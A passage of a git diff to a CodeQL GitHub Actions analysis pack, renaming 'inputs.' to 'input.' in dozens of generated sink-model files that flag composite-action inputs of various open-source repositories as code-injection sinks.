a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index 098d7c139fa..c2e56f7e175 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file + - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index def12e48741..54d0c8b2fe0 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"] - - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"] \ No newline at end of file + - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index 768db7317cc..b1914e7a96b 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"] - - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index 55218009c02..dd66f206ee9 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file + - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 17ec5471e85..0c26f02e6d8 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file + - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 55cd8b18241..2ee13115d6d 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file + - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 328d58d9e42..c76ed5b6604 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"] \ No newline at end of file + - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.java", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 836bda1041a..0bdf2087b46 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"] \ No newline at end of file + - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index b6f9ee027f1..bb83a5964e7 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"] \ No newline at end of file + - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 2f6458219b6..f29c52b1bf5 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 374a13ccd82..43745006f8d 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index fb4608ec70b..9289afb744f 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 3a6a4575d30..9729f966813 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] - - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file + - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index d21c609e5ed..92c25953944 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 76c92f51d26..c572c11ada4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index dc48b2e8d20..1819f4f716e 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] - - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b46b5592ac5..620100dd2d9 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] - - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file + - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index a38482ba696..dfb08d26058 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.local-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index ca1bf2f894f..a99ccc9e477 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4a46ca788e5..3a1e7b9d336 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b1c5270165b..c15c1fac006 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file + - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 9fcaa3fff76..b0c787fa378 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index f21c3c1f9de..86278889fdf 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file + - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 7ff68860cf8..4bf92a25123 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9e3d5bd41e3..79c13504fab 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file + - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 63373bd78a7..45ac61c8ef9 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 529614b8d79..ce546fceb4b 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index ce3ce91d773..b34c6d46da3 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] - - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file + - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index ececaa835e9..f87e0c02529 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file + - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.local-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 0c19019e4f3..88348f05cd0 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 67a21fc2e86..76fe3bed472 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file + - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 3f0c5e645de..bf1a498d7a0 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file + - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 470109b5e85..b985d87f7e1 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 5ffefd58e53..8e7cdd0308c 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file + - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 742e1876811..cf30d0d19cc 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ 